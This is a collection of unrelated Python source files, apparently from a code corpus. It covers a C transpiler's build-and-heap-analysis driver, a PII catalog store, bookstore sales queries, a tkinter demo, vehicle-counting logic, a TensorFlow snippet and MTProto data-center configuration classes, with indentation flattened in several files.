print('\n\033[;1m > prometeo:\033[0;0m \033[91m file {} not found.\033[0;0m'.format(filename))
exit()
print('\n\033[;1m > prometeo:\033[0;0m starting transpilation')
pmt_path = os.path.dirname(prometeo.__file__)
filename_ = filename.split('.')[0]
sed_cmd = "sed '/# pure >/,/# pure </d' " + filename_ + '.py'
code = ''.join(os.popen(sed_cmd).read())
tree = ast.parse(code)
# ap.pprint(tree)
tree_copy = deepcopy(tree)
try:
result = prometeo.cgen.code_gen_c.to_source(tree, filename_, \
main=True,
size_of_pointer = size_of_pointer, \
size_of_int = size_of_int, \
size_of_double = size_of_double)
except prometeo.cgen.code_gen_c.cgenException as e:
print('\n > Exception -- prometeo code-gen: ', e.message)
code = ''.join(open(filename))
print(' > @ line {}:'.format(e.lineno) + '\033[34m' + \
code.splitlines()[e.lineno-1] + '\033[0;0m')
print(' > Exiting.\n')
if debug:
raise
else:
return 1
dest_file = open('__pmt_cache__/' + filename_ + '.c', 'w')
dest_file.write(prometeo.cgen.source_repr.pretty_source(result.source))
dest_file.close()
dest_file = open('__pmt_cache__/' + filename_ + '.h', 'w')
dest_file.write(prometeo.cgen.source_repr.pretty_source(result.header))
dest_file.close()
print('\033[;1m > prometeo:\033[0;0m code-generation successfully completed')
print('\033[;1m > prometeo:\033[0;0m starting worst-case heap usage analysis')
# compute heap usage
# load log file
with open('__pmt_cache__/dim_record.json') as f:
dim_vars = json.load(f, object_pairs_hook=OrderedDict)
# reverse ordered dictionary to apply iterative resolution of expressions
dim_vars = OrderedDict(reversed(list(dim_vars.items())))
# resolve dims and dimv values
dim_vars = resolve_dims_value(dim_vars)
# evaluate numerical expressions
for key, value in dim_vars.items():
if isinstance(value, list):
for i in range(len(value)):
for j in range(len(value[i])):
dim_vars[key][i][j] = str(numexpr.evaluate(str(value[i][j])))
else:
dim_vars[key] = str(numexpr.evaluate(str(value)))
# load log file
with open('__pmt_cache__/heap64.json') as f:
heap64_data = json.load(f)
# resolve values of heap usage in calls
for key, value in heap64_data.items():
for item in dim_vars:
if item in heap64_data[key]:
heap64_data[key] = re.sub(r'\b' + item + r'\b', dim_vars[item], heap64_data[key])
# evaluate numerical expressions
for key, value in heap64_data.items():
heap64_data[key] = str(numexpr.evaluate(str(value)))
# load log file (8-byte aligned)
with open('__pmt_cache__/heap8.json') as f:
heap8_data = json.load(f)
# resolve values of heap usage in calls
for key, value in heap8_data.items():
for item in dim_vars:
if item in heap8_data[key]:
heap8_data[key] = re.sub(r'\b' + item + r'\b', dim_vars[item], heap8_data[key])
# evaluate numerical expressions
for key, value in heap8_data.items():
heap8_data[key] = str(numexpr.evaluate(str(value)))
visitor = ast_visitor()
visitor.visit(tree_copy)
call_graph = visitor.callees
typed_record = visitor.typed_record
meta_info = visitor.meta_info
# print('\ncall graph:\n\n', call_graph, '\n\n')
reach_map, call_graph = compute_reach_graph(\
call_graph, typed_record, meta_info)
# check that there are no cycles containing memory allocations
for method in reach_map:
if '*' in reach_map[method] and typed_record[method] != dict():
raise Exception('\n\nDetected cycle {} containing memory'
' allocation.\n'.format(reach_map[method]))
# update heap usage with memory associated with
# constructors (escape memory)
# load log file
with open('__pmt_cache__/constructor_record.json') as f:
constructors_list = json.load(f)
for caller, callees in call_graph.items():
for callee in callees:
# if call is a constructor, then account for
# escaped memory
if callee in constructors_list:
heap64_data[caller] = str(int(heap64_data[caller])
+ int(heap64_data[callee]))
heap8_data[caller] = str(int(heap8_data[caller])
+ int(heap8_data[callee]))
# print('reach_map:\n\n', reach_map, '\n\n')
# Bellman-Ford algorithm
# build memory graph (64-bytes aligned)
nodes = []
edges = []
for key, value in call_graph.items():
nodes.append(key)
for key, value in call_graph.items():
# if leaf node
if not value:
value = ['end']
for node in value:
if node in heap64_data:
heap_usage = -int(heap64_data[node])
else:
heap_usage = 0
# import pdb; pdb.set_trace()
edges.append([(key,node), heap_usage])
# add artificial end node
nodes.append('end')
if 'global@main' in heap64_data:
heap_main = -int(heap64_data['global@main'])
else:
heap_main = 0
mem_graph = Graph(nodes, edges, 'global@main', 'end', heap_main)
        worst_case_heap_usage_64 = -mem_graph.compute_shortest_path()
# build memory graph (8-bytes aligned)
nodes = []
edges = []
for key, value in call_graph.items():
nodes.append(key)
for key, value in call_graph.items():
# if leaf node
if not value:
value = ['end']
for node in value:
if node in heap8_data:
heap_usage = -int(heap8_data[node])
else:
heap_usage = 0
# import pdb; pdb.set_trace()
edges.append([(key,node), heap_usage])
# add artificial end node
nodes.append('end')
if 'global@main' in heap8_data:
heap_main = -int(heap8_data['global@main'])
else:
heap_main = 0
mem_graph = Graph(nodes, edges, 'global@main', 'end', heap_main)
        worst_case_heap_usage_8 = -mem_graph.compute_shortest_path()
print('\033[;1m > prometeo:\033[0;0m heap usage analysis completed successfully\n \
\033[34m{}\033[0;0m(\033[34m{}\033[0;0m) 64(8)-bytes aligned\n'.format(\
worst_case_heap_usage_64, worst_case_heap_usage_8))
# generate Makefile
makefile_code = makefile_template.replace('{{ filename }}', filename_)
makefile_code = makefile_code.replace('{{ HEAP8_SIZE }}', str(worst_case_heap_usage_8))
# NOTE: factor 2 due to alignment
makefile_code = makefile_code.replace('{{ HEAP64_SIZE }}', str(worst_case_heap_usage_64))
makefile_code = makefile_code.replace('\n','', 1)
makefile_code = makefile_code.replace('{{ INSTALL_DIR }}', os.path.dirname(__file__) + '/..')
with open('__pmt_cache__/casadi_funs.json') as f:
casadi_funs = json.load(f, object_pairs_hook=OrderedDict)
casadi_target_code = '\nOBJS = '
for item in casadi_funs:
fun_name = item.replace('@', '_')
casadi_target_code = casadi_target_code + ' ' + 'casadi_wrapper_' + fun_name + '.o ' + fun_name + '.o'
casadi_target_code = casadi_target_code + '\n\ncasadi: '
for item in casadi_funs:
fun_name = item.replace('@', '_')
casadi_target_code = casadi_target_code + ' ' + fun_name
for item in casadi_funs:
fun_name = item.replace('@', '_')
casadi_target_code = casadi_target_code + '\n\n'
casadi_target_code = casadi_target_code + fun_name + ':\n'
casadi_target_code = casadi_target_code + "\t$(CC) -c " + fun_name + '.c ' + 'casadi_wrapper_' + fun_name + '.c\n'
makefile_code = makefile_code.replace('{{ CASADI_TARGET }}', casadi_target_code)
dest_file = open('__pmt_cache__/Makefile', 'w+')
dest_file.write(makefile_code)
dest_file.close()
print('\033[;1m > prometeo:\033[0;0m building C code')
os.chdir('__pmt_cache__')
proc = subprocess.Popen(["make", "clean"], stdout=subprocess.PIPE)
try:
outs, errs = proc.communicate(timeout=20)
        except subprocess.TimeoutExpired:
proc.kill()
outs, errs = proc.communicate()
print('Command \'make\' timed out.')
if proc.returncode:
raise Exception('Command \'make\' failed with the above error.'
' Full command is:\n\n {}'.format(outs.decode()))
proc = subprocess.Popen(["make", "all"], stdout=subprocess.PIPE)
try:
outs, errs = proc.communicate(timeout=20)
        except subprocess.TimeoutExpired:
proc.kill()
outs, errs = proc.communicate()
print('Command \'make \' timed out.')
if proc.returncode:
raise Exception('Command \'make\' failed with the above error.'
' Full command is:\n\n {}'.format(outs.decode()))
print('\033[;1m > prometeo:\033[0;0m successfully built C code')
print('\033[;1m > prometeo:\033[0;0m running compiled C code:\n')
INSTALL_DIR = os.path.dirname(__file__) + '/..'
running_on = platform.system()
if running_on == 'Linux':
cmd = 'export LD_LIBRARY_PATH=' + INSTALL_DIR + '/lib/prometeo:' + \
INSTALL_DIR + '/lib/blasfeo:$LD_LIBRARY_PATH ; ./' + filename_
elif running_on == 'Darwin':
cmd = 'export DYLD_LIBRARY_PATH=' + INSTALL_DIR + '/lib/prometeo:' + \
INSTALL_DIR + '/lib/blasfeo:$DYLD_LIBRARY_PATH ; ./' + filename_
else:
raise Exception('Running on unsupported operating system {}'.format(running_on))
tic = time.time()
proc = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE)
try:
outs, errs = proc.communicate()
        except subprocess.TimeoutExpired:
proc.kill()
outs, errs = proc.communicate()
print('Command {} timed out.'.format(cmd))
toc = time.time() - tic
if red_stdout is not None:
with open(red_stdout, 'w') as f:
f.write(outs.decode())
else:
print(outs.decode())
if proc.returncode:
raise Exception('Command {} failed with the above error.'
' Full command is:\n\n {}'.format(cmd, outs.decode()))
print('\n\033[;1m > prometeo:\033[0;0m exiting\n')
os.chdir('..')
|
11557287
|
from contextlib import closing
from dbcat import Catalog, catalog_connection, init_db, pull
from piicatcher.catalog import Store
class DbStore(Store):
@classmethod
def save_schemas(cls, explorer):
catalog: Catalog = catalog_connection(explorer.catalog_conf)
with closing(catalog) as catalog:
init_db(catalog)
with catalog.managed_session:
print("Connection: {}".format(explorer.connection_parameters))
source = catalog.add_source(
explorer.database.get_name(),
explorer.type,
**explorer.connection_parameters
)
pull(catalog, source.name)
schemas = explorer.get_schemas()
with catalog.managed_session:
for s in schemas:
for t in s.get_children():
for c in t.get_children():
column = catalog.get_column(
source_name=explorer.database.get_name(),
schema_name=s.get_name(),
table_name=t.get_name(),
column_name=c.get_name(),
)
if c.has_pii():
catalog.set_column_pii_type(
column, c.get_pii_types().pop()
)
|
11557346
|
import datetime
from bookstore import db
from bookstore.models import OrderList, Books
from flask_sqlalchemy import SQLAlchemy
#start of the month
def calc_start(y, m):
return datetime.datetime(y, m, 1)
#end of the month
def calc_end(y, m):
if m == 2:
if (y % 4) == 0:
if (y % 100) == 0:
if (y % 400) == 0:
return datetime.datetime(y, m, 29, 23, 59, 59)
else:
return datetime.datetime(y, m, 28, 23, 59, 59)
else:
return datetime.datetime(y, m, 29, 23, 59, 59)
else:
return datetime.datetime(y, m, 28, 23, 59, 59)
else:
if m <= 7:
if m % 2 == 0:
return datetime.datetime(y, m, 30, 23, 59, 59)
else:
return datetime.datetime(y, m, 31, 23, 59, 59)
else:
if m % 2 == 0:
return datetime.datetime(y, m, 31, 23, 59, 59)
else:
return datetime.datetime(y, m, 30, 23, 59, 59)
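# Equivalent, simpler alternative (sketch) using the standard library:
#
#     import calendar
#     def calc_end(y, m):
#         return datetime.datetime(y, m, calendar.monthrange(y, m)[1], 23, 59, 59)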
def total_sales_bw_b_e_admin(begin="2021-05-01", end="2021-05-31"):
return db.session.query(db.func.sum(OrderList.total_price)).filter(OrderList.selling_date >= begin, OrderList.selling_date <= end).scalar()
def total_books_bw_b_e_admin(book_id):
try:
return db.session.query(db.func.sum(OrderList.total_price)).filter(OrderList.book_ISBN == book_id).scalar()
    except Exception:
return 0
#total sales calculation
def calc_sales(y):
sales_yearly = list()
for i in range(1, 13):
beg = calc_start(y, i)
en = calc_end(y, i)
temp = total_sales_bw_b_e_admin(beg, en)
if temp is None:
temp = 0
sales_yearly.append(temp)
return sales_yearly
#for book wise sales
def book_wise():
books_yearly = dict()
for i in OrderList.query.with_entities(OrderList.book_ISBN).distinct():
temp = total_books_bw_b_e_admin(int(i[0]))
if temp is None:
temp = 0
book = Books.query.filter_by(bid=int(i[0])).first()
title = book.title
books_yearly[title] = temp
return books_yearly
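# Usage sketch (requires a Flask application context with the bookstore db bound):
#
#     monthly = calc_sales(2021)   # [jan_total, feb_total, ..., dec_total]
#     per_book = book_wise()       # {title: lifetime total of OrderList.total_price}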
|
11557356
|
class Folder:
def __init__(self, name):
self.name = name
self.children = {}
def add_child(self, child):
pass
def move(self, new_path):
pass
def copy(self, new_path):
pass
def delete(self):
pass
class File:
def __init__(self, name, contents):
self.name = name
self.contents = contents
def move(self, new_path):
pass
def copy(self, new_path):
pass
def delete(self):
pass
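# Sketch of one plausible in-memory behaviour for the stubs above
# (illustrative only; path handling would live in a surrounding filesystem object):
#
#     def add_child(self, child):          # Folder.add_child
#         self.children[child.name] = child
#
#     root = Folder("root")
#     root.add_child(File("notes.txt", "hello"))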
|
11557361
|
import tkinter as tk
# --- functions ---
def mouse_wheel(event):
global number
# respond to Linux or Windows wheel event
if event.num == 5 or event.delta == -120:
number -= 1
if event.num == 4 or event.delta == 120:
number += 1
label['text'] = number
# --- main ---
number = 0
root = tk.Tk()
label = tk.Label(root, text="0")
label.pack(ipadx=15, ipady=5)
# Windows
root.bind("<MouseWheel>", mouse_wheel)
# Linux
root.bind("<Button-4>", mouse_wheel)
root.bind("<Button-5>", mouse_wheel)
root.mainloop()
|
11557363
|
from chromeless import Chromeless as _Chromeless, dumps
class Chromeless(_Chromeless):
def __invoke_local(self, dumped):
print("__invoke_local")
print(dumped)
with open('/tmp/dumped.txt', 'w') as f:
f.write(dumped)
return dumps(("hoge", {"status": "succeess"}))
def get_title(self, url):
self.get(url)
return self.title
if __name__ == '__main__':
chrome = Chromeless()
    # attach the plain function (get_title is defined on the class, not at module level)
    chrome.attach(Chromeless.get_title)
print(chrome.get_title("https://example.com"))
|
11557389
|
import cv2
# import speed_prediction
import tools.speed_prediction as speed_prediction
# from core.config import cfg
# from core.utils import read_class_names
# is_vehicle_detected = [0]
left_vehicle_counter = 0
right_vehicle_counter = 0
bottom_vehicle_counter = 0
LEFT_INTERSECTION_ROI_POSITION = 400
LEFT_INTERSECTION_ROI_START = 300
LEFT_INTERSECTION_ROI_END = 550
RIGHT_INTERSECTION_ROI_POSITION = 1000
RIGHT_INTERSECTION_ROI_START = 0
RIGHT_INTERSECTION_ROI_END = 250
BOTTOM_INTERSECTION_ROI_POSITION = 600
BOTTOM_INTERSECTION_ROI_START = 600
BOTTOM_INTERSECTION_ROI_END = 1000
def vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
# crop_img,
roi_position,
roi_start,
roi_end,
    roi_direction
):
    isInROI = False  # whether the object is inside the Region Of Interest
vehicle_front = 0
is_vehicle_detected = []
direction = ''
speed = 0
# direction change
    if roi_direction == 'top_to_bottom':
vehicle_front = box_bottom
vehicle_back = box_top
vehicle_left = box_right
vehicle_right = box_left
    elif roi_direction == 'bottom_to_top':
vehicle_front = box_top
vehicle_back = box_bottom
vehicle_left = box_left
vehicle_right = box_right
    elif roi_direction == 'left_to_right':
vehicle_front = box_right
vehicle_back = box_left
vehicle_left = box_top
vehicle_right = box_bottom
    elif roi_direction == 'right_to_left':
vehicle_front = box_left
vehicle_back = box_right
vehicle_left = box_bottom
vehicle_right = box_top
else:
vehicle_front = 0
vehicle_back = 0
vehicle_left = 0
vehicle_right = 0
# determine if the vehicle is on the line
if max(vehicle_front,vehicle_back) > roi_position and \
min(vehicle_front,vehicle_back) < roi_position and \
vehicle_left > roi_start and \
vehicle_left < roi_end and \
vehicle_right > roi_start and \
vehicle_right < roi_end:
# # debug
# print('vehicle on line')
direction, speed, is_vehicle_detected, update_csv = speed_prediction.predict_speed(
vehicle_front,
vehicle_back,
current_frame_number,
# crop_img,
roi_position)
if(1 in is_vehicle_detected):
counting = True
del is_vehicle_detected[:]
is_vehicle_detected = []
else:
counting = False
return (direction, speed, counting)
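# Worked example (hypothetical box): with roi_direction='left_to_right',
# roi_position=400, roi_start=300 and roi_end=550, a box with box_left=390,
# box_right=410, box_top=320 and box_bottom=340 straddles the ROI line
# (min(front, back) < 400 < max(front, back)) and lies inside [300, 550],
# so predict_speed() is consulted and the vehicle may be counted.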
def vehicle_counting_multi(
image,
box_top,
box_bottom,
box_right,
box_left,
current_frame_number):
global left_vehicle_counter
global right_vehicle_counter
global bottom_vehicle_counter
# left intersection
left_direction, left_speed, left_counting = vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
LEFT_INTERSECTION_ROI_POSITION,
LEFT_INTERSECTION_ROI_START,
LEFT_INTERSECTION_ROI_END,
'left_to_right')
# when the vehicle passed over line and counted, make the color of ROI line green
if left_counting:
left_vehicle_counter += 1
cv2.line(image, \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_START), \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_END), \
(0, 0xFF, 0), 5)
else:
cv2.line(image, \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_START), \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_END), \
(0, 0, 0xFF), 5)
# right intersection
right_direction, right_speed, right_counting = vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
RIGHT_INTERSECTION_ROI_POSITION,
RIGHT_INTERSECTION_ROI_START,
RIGHT_INTERSECTION_ROI_END,
'right_to_left')
if right_counting:
right_vehicle_counter += 1
cv2.line(image, \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_START), \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_END), \
(0, 0xFF, 0), 5)
else:
cv2.line(image, \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_START), \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_END), \
(0, 0, 0xFF), 5)
# bottom intersection
bottom_direction, bottom_speed, bottom_counting = vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
BOTTOM_INTERSECTION_ROI_POSITION,
BOTTOM_INTERSECTION_ROI_START,
BOTTOM_INTERSECTION_ROI_END,
'bottom_to_top')
if bottom_counting:
bottom_vehicle_counter += 1
cv2.line(image, \
(BOTTOM_INTERSECTION_ROI_START, BOTTOM_INTERSECTION_ROI_POSITION), \
(BOTTOM_INTERSECTION_ROI_END, BOTTOM_INTERSECTION_ROI_POSITION), \
(0, 0xFF, 0), 5)
else:
cv2.line(image, \
(BOTTOM_INTERSECTION_ROI_START, BOTTOM_INTERSECTION_ROI_POSITION), \
(BOTTOM_INTERSECTION_ROI_END, BOTTOM_INTERSECTION_ROI_POSITION), \
(0, 0, 0xFF), 5)
return (image, left_vehicle_counter, right_vehicle_counter, bottom_vehicle_counter)
# def draw_bbox(image, bboxes, current_frame_number, classes=read_class_names(cfg.YOLO.CLASSES), show_label=True):
# """
# bboxes: [x_min, y_min, x_max, y_max, probability, cls_id] format coordinates.
# """
# num_classes = len(classes)
# image_h, image_w, _ = image.shape
# hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
# colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
# colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
# random.seed(0)
# random.shuffle(colors)
# random.seed(None)
# for i, bbox in enumerate(bboxes):
# coor = np.array(bbox[:4], dtype=np.int32)
# fontScale = 0.5
# score = bbox[4]
# class_ind = int(bbox[5])
# bbox_color = colors[class_ind]
# bbox_thick = int(0.6 * (image_h + image_w) / 600)
# c1, c2 = (coor[0], coor[1]), (coor[2], coor[3])
# cv2.rectangle(image, c1, c2, bbox_color, bbox_thick)
# image, left_vehicle_counter, right_vehicle_counter, bottom_vehicle_counter = vehicle_counting_multi(image, \
# coor[1], \
# coor[3], \
# coor[2], \
# coor[0], \
# current_frame_number)
# if show_label:
# bbox_mess = '%s: %.2f' % (classes[class_ind], score)
# t_size = cv2.getTextSize(bbox_mess, 0, fontScale, thickness=bbox_thick//2)[0]
# cv2.rectangle(image, c1, (c1[0] + t_size[0], c1[1] - t_size[1] - 3), bbox_color, -1) # filled
# cv2.putText(image, bbox_mess, (c1[0], c1[1]-2), cv2.FONT_HERSHEY_SIMPLEX,
# fontScale, (0, 0, 0), bbox_thick//2, lineType=cv2.LINE_AA)
# left_info = 'Left Vehicle Number: ' + left_vehicle_counter
# right_info = 'Right Vehicle Number: ' + right_vehicle_counter
# bottom_info = 'Bottom Vehicle Number: ' + bottom_vehicle_counter
# cv2.putText(image, text=left_info, org=(50, 90), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
# fontScale=1, color=(255, 0, 0), thickness=2)
# cv2.putText(image, text=right_info, org=(50, 90), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
# fontScale=1, color=(255, 0, 0), thickness=2)
# cv2.putText(image, text=bottom_info, org=(50, 90), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
# fontScale=1, color=(255, 0, 0), thickness=2)
# return image
|
11557407
|
import tensorflow as tf
# compat.v1 placeholders require graph mode; disable eager execution first (TF2).
tf.compat.v1.disable_eager_execution()
in_b_ = tf.compat.v1.placeholder(dtype=tf.bool, shape=[2], name="Hole")
in_x_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 3], name="Hole")
in_y_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 3], name="Hole")
where_ = tf.compat.v1.where(in_b_, in_x_, in_y_)
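# Minimal usage sketch: feed concrete values and evaluate the selection.
if __name__ == "__main__":
    import numpy as np
    with tf.compat.v1.Session() as sess:
        out = sess.run(where_, feed_dict={
            in_b_: [True, False],
            in_x_: np.ones((2, 3), dtype=np.float32),
            in_y_: np.zeros((2, 3), dtype=np.float32),
        })
        print(out)  # first row from x (b[0] is True), second row from y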
|
11557423
|
from __future__ import annotations
from .configs import *
from . import shared as td
class MTP(BaseObject): # nocov
"""
    [MTProto Protocol](https://core.telegram.org/mtproto)
    This class is reserved for future development and currently has no usage.
    ### Attributes:
        `Environment` (`class`): MTP Environment
`RSAPublicKey` (`class`): RSAPublicKey
`DcOptions` (`class`): DcOptions
`ConfigFields` (`class`): ConfigFields
`Config` (`class`): Config
"""
class Environment(IntEnum):
"""
        Environment flag for MTP.Config
### Attributes:
            Production (`IntEnum`): Production Environment
            Test (`IntEnum`): Test Environment
"""
Production = 0
Test = 1
class RSAPublicKey(BaseObject):
"""
To be added
"""
class DcOptions(BaseObject):
"""
        Data Center Options, providing information about DC IPs, ports, etc.
"""
kVersion = 2
        def __init__(self, environment: MTP.Environment) -> None:
            self._environment = environment
self._publicKeys: typing.Dict[DcId, MTP.RSAPublicKey] = {}
self._cdnPublicKeys: typing.Dict[DcId, MTP.RSAPublicKey] = {}
self._data: typing.Dict[DcId, typing.List[MTP.DcOptions.Endpoint]] = {}
self.constructFromBuiltIn()
def isTestMode(self):
            return self._environment != MTP.Environment.Production
def constructAddOne(
self, id: DcId, flags: MTP.DcOptions.Flag, ip: str, port: int, secret: bytes
):
self.applyOneGuarded(DcId.BareDcId(id), flags, ip, port, secret)
def applyOneGuarded(
self, id: DcId, flags: MTP.DcOptions.Flag, ip: str, port: int, secret: bytes
):
if not id in self._data:
self._data[id] = []
else:
for endpoint in self._data[id]:
                    if (endpoint.ip == ip) and (endpoint.port == port):
                        # this endpoint already exists in self._data, do not add a duplicate
                        return
            endpoint = MTP.DcOptions.Endpoint(id, flags, ip, port, secret)
self._data[id].append(endpoint)
def constructFromBuiltIn(self) -> None:
# TO BE ADDED
# self.readBuiltInPublicKeys()
def addToData(dcs: List[BuiltInDc], flags: MTP.DcOptions.Flag):
for dc in dcs:
self.applyOneGuarded(dc.id, flags, dc.ip, dc.port, bytes())
if self.isTestMode():
addToData(BuiltInDc.kBuiltInDcsTest, MTP.DcOptions.Flag.f_static | 0) # type: ignore
addToData(BuiltInDc.kBuiltInDcsIPv6Test, MTP.DcOptions.Flag.f_static | MTP.DcOptions.Flag.f_ipv6) # type: ignore
else:
addToData(BuiltInDc.kBuiltInDcs, MTP.DcOptions.Flag.f_static | 0) # type: ignore
addToData(BuiltInDc.kBuiltInDcsIPv6, MTP.DcOptions.Flag.f_static | MTP.DcOptions.Flag.f_ipv6) # type: ignore
def constructFromSerialized(self, serialized: QByteArray):
stream = QDataStream(serialized)
stream.setVersion(QDataStream.Version.Qt_5_1)
minusVersion = stream.readInt32()
version = (-minusVersion) if (minusVersion < 0) else 0
count = stream.readInt32() if version > 0 else minusVersion
self._data.clear()
for i in range(0, count):
dcId = DcId(stream.readInt32())
flags = MTP.DcOptions.Flag(stream.readInt32())
port = stream.readInt32()
ipSize = stream.readInt32()
kMaxIpSize = 45
Expects(
condition=((ipSize > 0) and (ipSize <= kMaxIpSize)),
exception=TDataBadConfigData("Bad ipSize data"),
)
ip = stream.readRawData(ipSize).decode("ascii")
kMaxSecretSize = 32
secret = bytes()
if version > 0:
secretSize = stream.readInt32()
Expects(
condition=(
(secretSize >= 0) and (secretSize <= kMaxSecretSize)
),
exception=TDataBadConfigData("Bad secretSize data"),
)
if secretSize > 0:
secret = stream.readRawData(secretSize)
ExpectStreamStatus(stream, "Could not stream config data")
self.applyOneGuarded(dcId, flags, ip, port, secret)
# TO BE ADDED
# Read CDN config
def Serialize(self) -> QByteArray:
optionsCount = 0
for dcId, endpoints in self._data.items():
if DcId.BareDcId(dcId) > 1000:
continue
optionsCount += len(endpoints)
result = QByteArray()
stream = QDataStream(result, QIODevice.OpenModeFlag.WriteOnly)
stream.setVersion(QDataStream.Version.Qt_5_1)
stream.writeInt32(-MTP.DcOptions.kVersion) # -2
# Dc options.
stream.writeInt32(optionsCount)
for dcId, endpoints in self._data.items():
if DcId.BareDcId(dcId) > 1000:
continue
# write endpoints
for endpoint in endpoints:
stream.writeInt32(endpoint.id)
                    stream.writeInt32(endpoint.flags)
                    # the deserializer reads the port right after the flags
                    stream.writeInt32(endpoint.port)
stream.writeInt32(len(endpoint.ip))
stream.writeRawData(endpoint.ip.encode("ascii"))
stream.writeInt32(len(endpoint.secret))
stream.writeRawData(endpoint.secret)
# CDN public keys.
# TO BE ADDED
publicKeys = []
stream.writeInt32(len(publicKeys))
# for (auto &key : publicKeys) {
# stream << qint32(key.dcId)
# << Serialize::bytes(key.n)
# << Serialize::bytes(key.e);
# }
return result
class Address(int):
"""
Connection flag used for MTP.DcOptions.Endpoint
### Attributes:
IPv4 (`int`): IPv4 connection
IPv6 (`int`): IPv6 connection
"""
IPv4 = 0
IPv6 = 1
class Protocol(int):
"""
        Protocol flag used for MTP.DcOptions.Endpoint
### Attributes:
Tcp (`int`): Tcp connection
Http (`int`): Http connection
"""
Tcp = 0
Http = 1
class Flag(int):
"""
Flag used for MTP.DcOptions.Endpoint
### Attributes:
f_ipv6 (`int`): f_ipv6
f_media_only (`int`): f_media_only
f_tcpo_only (`int`): f_tcpo_only
f_cdn (`int`): f_cdn
f_static (`int`): f_static
f_secret (`int`): f_secret
MAX_FIELD (`int`): MAX_FIELD
"""
f_ipv6 = 1 << 0
f_media_only = 1 << 1
f_tcpo_only = 1 << 2
f_cdn = 1 << 3
f_static = 1 << 4
f_secret = 1 << 10
MAX_FIELD = 1 << 10
class Endpoint(BaseObject):
"""
Data center endpoint
### Attributes:
id (`DcId`): Data Center ID
flags (`Flag`): `Flag`
ip (`str`): IP address of the data center
port (`int`): Port to connect to
secret (`bytes`): secret
"""
def __init__(
self,
id: int,
flags: MTP.DcOptions.Flag,
ip: str,
port: int,
secret: bytes,
) -> None:
self.id = id
self.flags = flags
self.ip = ip
self.port = port
self.secret = secret
class ConfigFields(BaseObject):
"""
Configuration data for `MTP.Config`
### Attributes:
chatSizeMax (`int`): `200`
megagroupSizeMax (`int`): `10000`
forwardedCountMax (`int`): `100`
onlineUpdatePeriod (`int`): `120000`
offlineBlurTimeout (`int`): `5000`
offlineIdleTimeout (`int`): `30000`
onlineFocusTimeout (`int`): `1000` `# Not from the server config.`
onlineCloudTimeout (`int`): `300000`
notifyCloudDelay (`int`): `30000`
notifyDefaultDelay (`int`): `1500`
savedGifsLimit (`int`): `200`
editTimeLimit (`int`): `172800`
revokeTimeLimit (`int`): `172800`
revokePrivateTimeLimit (`int`): `172800`
revokePrivateInbox (`bool`): `False`
stickersRecentLimit (`int`): `30`
stickersFavedLimit (`int`): `5`
pinnedDialogsCountMax (`int`): `5`
pinnedDialogsInFolderMax (`int`): `100`
internalLinksDomain (`str`): `"https://t.me/"`
channelsReadMediaPeriod (`int`): `86400 * 7`
callReceiveTimeoutMs (`int`): `20000`
callRingTimeoutMs (`int`): `90000`
callConnectTimeoutMs (`int`): `30000`
callPacketTimeoutMs (`int`): `10000`
webFileDcId (`int`): `4`
txtDomainString (`str`): `str()`
phoneCallsEnabled (`bool`): `True`
blockedMode (`bool`): `False`
captionLengthMax (`int`): `1024`
"""
def __init__(self) -> None:
self.chatSizeMax = 200
self.megagroupSizeMax = 10000
self.forwardedCountMax = 100
self.onlineUpdatePeriod = 120000
self.offlineBlurTimeout = 5000
self.offlineIdleTimeout = 30000
self.onlineFocusTimeout = 1000 # Not from the server config.
self.onlineCloudTimeout = 300000
self.notifyCloudDelay = 30000
self.notifyDefaultDelay = 1500
self.savedGifsLimit = 200
self.editTimeLimit = 172800
self.revokeTimeLimit = 172800
self.revokePrivateTimeLimit = 172800
self.revokePrivateInbox = False
self.stickersRecentLimit = 30
self.stickersFavedLimit = 5
self.pinnedDialogsCountMax = 5
self.pinnedDialogsInFolderMax = 100
self.internalLinksDomain = "https://t.me/"
self.channelsReadMediaPeriod = 86400 * 7
self.callReceiveTimeoutMs = 20000
self.callRingTimeoutMs = 90000
self.callConnectTimeoutMs = 30000
self.callPacketTimeoutMs = 10000
self.webFileDcId = 4
self.txtDomainString = str()
self.phoneCallsEnabled = True
self.blockedMode = False
self.captionLengthMax = 1024
class Config(BaseObject):
"""
Configuration of MTProto
### Attributes:
kVersion (`int`): `1`
"""
kVersion = 1
        def __init__(self, environment: MTP.Environment) -> None:
            self._dcOptions = MTP.DcOptions(environment)
self._fields = MTP.ConfigFields()
self._fields.webFileDcId = 2 if self._dcOptions.isTestMode() else 4
self._fields.txtDomainString = (
"tapv3.stel.com" if self._dcOptions.isTestMode() else "apv3.stel.com"
)
def endpoints(
self, dcId: DcId = DcId._0
) -> Dict[
MTP.DcOptions.Address,
Dict[MTP.DcOptions.Protocol, List[MTP.DcOptions.Endpoint]],
]:
endpoints = self._dcOptions._data[dcId]
Address = MTP.DcOptions.Address
Protocol = MTP.DcOptions.Protocol
Flag = MTP.DcOptions.Flag
Endpoint = MTP.DcOptions.Endpoint
results: Dict[Address, Dict[Protocol, List[Endpoint]]] = {}
results[Address.IPv4] = {Protocol.Tcp: [], Protocol.Http: []} # type: ignore
